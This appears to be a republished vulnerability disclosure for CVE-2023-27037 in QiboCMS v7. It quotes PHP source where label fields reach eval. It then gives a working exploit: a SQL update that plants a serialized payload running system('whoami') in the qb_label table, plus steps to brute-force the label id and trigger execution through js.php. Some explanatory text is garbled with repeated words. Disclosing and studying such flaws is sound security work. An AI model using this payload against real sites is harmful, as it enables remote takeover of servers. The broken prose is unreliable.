Headline

CVE-2023-27037: vul/2023-01-14.md at main · dienamer/vul

Qibosoft QiboCMS v7 was discovered to contain a remote code execution (RCE) vulnerability via the Get_Title function at label_set_rs.php

2 years ago

CVE

Open in Source

#sql #vulnerability #web #js #java #php #rce

qibo_v7-Rce****label_set_rs.php

lobal $db,$pre,$timestamp,$webdb,$TB_url;
    //分类的话,对于分表的情况,要特别处理,不支持其它频道调用,会出错
    if($format[SYS]=='fenlei'&&!$rs[posttime]){
        global $Fid_db;
        $_erp=$Fid_db[tableid][$rs[fid]];       
        $rs=$db->get_one("SELECT * FROM {$pre}{$format[wninfo]}content$_erp WHERE id='$rs[id]' ");
    }

    //读取自定义字段的表,方便调用,如果声明了noReadMid就不要读了
    if($format[wninfo]&&$rs[mid]&&!$format[noReadMid]){
        $_rss=$db->get_one("SELECT * FROM {$pre}{$format[wninfo]}content_{$rs[mid]} WHERE id='$rs[id]' ");
        $_rss && $rs=$rs+$_rss;
    //文章要读取自定义字段的表,方便调用
    }elseif($format[SYS]=='artcile'&&$rs[mid]){
        $_rss=$db->get_one("SELECT * FROM {$pre}article_content_{$rs[mid]} WHERE aid='$rs[aid]' ");
        $_rss && $rs=$rs+$_rss;
    }

    //扩展接口,少用
    if($format[eval_code]){

        eval($format[eval_code]);

    }


$ format is the parameter parameter parameter parameter parameter parameter parameter parameter parameter that we pass in, $formati [eval_code] is a function when there is a value and a value.


function Get_Title($format){
    global $db,$webdb,$pre,$ModuleDB;
    
    //CMS万能文章专题里的文章

    if($format['SYS']=='CMS'&&$format['ctype']=='special'){
        return CMS_special($format);
    }


    //方便下面得到URL的真实列表地址
    $page=1;
    
    if(strstr($format[sql],'$GLOBALS[')){
        eval("\$format[sql]=\"$format[sql]\";");
    }
    if(strstr($format[sql2],'$GLOBALS[')){
        eval("\$format[sql2]=\"$format[sql2]\";");
    }
    //此处屏障报错,主要是处理不同版本之间存在的一些差异性问题
    $query=$db->query("$format[sql]",'','0');
    if(!$query){
        return ;
    }
 
    //辅助模板存在,并且辅助SQL存在的话,要读数据库
    if($format[tplpart_2code]&&$format[sql2]){
        $query2=$db->query($format[sql2],'','0');
        $rs2=$db->fetch_array($query2);
        $rs2=label_set_rs($format,$rs2);
    }
}


Here $format[SYS] cannot be CMS and $format[sql] is a sql statement that can be executed accurately, and both $format[sql2] and $format[tplpart_2code] must be true, then you can enter label_set_rs and then enter js.php Get_Title is called in it.

js.php

<?php
error_reporting(0);extract($_GET);
require_once(dirname(__FILE__)."/../data/config.php");
if(!eregi("^([0-9]+)$",$id)){
    die("document.write('ID不存在');");
}
$FileName=dirname(__FILE__)."/../cache/js/";

$FileName.="{$id}.php";
//默认缓存3分钟.
if(!$webdb["cache_time_js"]){

    $webdb["cache_time_js"]=3;
}
var_dump(!$webdb["cache_time_js"]);
echo (time()-filemtime($FileName));


if( (time()-filemtime($FileName))<($webdb["cache_time_js"]*60) ){
    @include($FileName);
    $show=str_replace(array("\n","\r","'"),array("","","\'"),stripslashes($show));
    if($iframeID){  //框架方式不会拖慢主页面打开速度,推荐
        //处理跨域问题
        if($webdb[cookieDomain]){
            echo "<SCRIPT LANGUAGE=\"JavaScript\">document.domain = \"$webdb[cookieDomain]\";</SCRIPT>";
        }
        echo "<SCRIPT LANGUAGE=\"JavaScript\">
        parent.document.getElementById('$iframeID').innerHTML='$show';
        </SCRIPT>";
    }else{          //JS式会拖慢主页面打开速度,不推荐
        echo "document.write('$show');";
    }
    exit;
}

require(dirname(__FILE__)."/"."global.php");
require_once(ROOT_PATH."inc/label_funcation.php");

    $query=$db->query(" SELECT * FROM {$pre}label WHERE lid='$id' ");

    while( $rs=$db->fetch_array($query) ){
        //读数据库的标签
        if( $rs[typesystem] )
        {
            unserialize($rs['code']);
            $_array=unserialize($rs[code]);
            var_dump($_array);
            $value=($rs[type]=='special')?Get_sp($_array):Get_Title($_array);
            if(strstr($value,"(/mv)")){
                $value=get_label_mv($value);
            }
            if($_array[c_rolltype])
            {
                $value="<marquee direction='$_array[c_rolltype]' scrolldelay='1' scrollamount='1' onmouseout='if(document.all!=null){this.start()}' onmouseover='if(document.all!=null){this.stop()}' height='$_array[roll_height]'>$value</marquee>";
            }
        }


First of all, the $id here is passed in through $_GET['id'] and must be a number. The id is spliced with the sql statement. When the data is queried, it will enter a loop, and then determine whether $rs[tyoesystem] is true. If it is true, it will enter the loop, and then deserialize $rs[code], and then $rs[type] here cannot be special, and then the array will be passed to Get_Title.

Here we can upload a sql file, create a 1.sql, and write the following statement.

update  qb_label set code='a:6:{s:13:"tplpart_1code";s:4:"test";s:13:"tplpart_2code";s:4:"test";s:3:"SYS";s:7:"artcile";s:9:"eval_code";s:17:"system("whoami");";s:3:"sql";s:24:"select * from qb_article";s:4:"sql2";b:1;}',typesystem=1,type='code' where lid=741;


Then upload, the lid here can be blasted.
then visit

Use successfully.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

1 year ago

1 year ago

1 year ago

1 year ago

1 year ago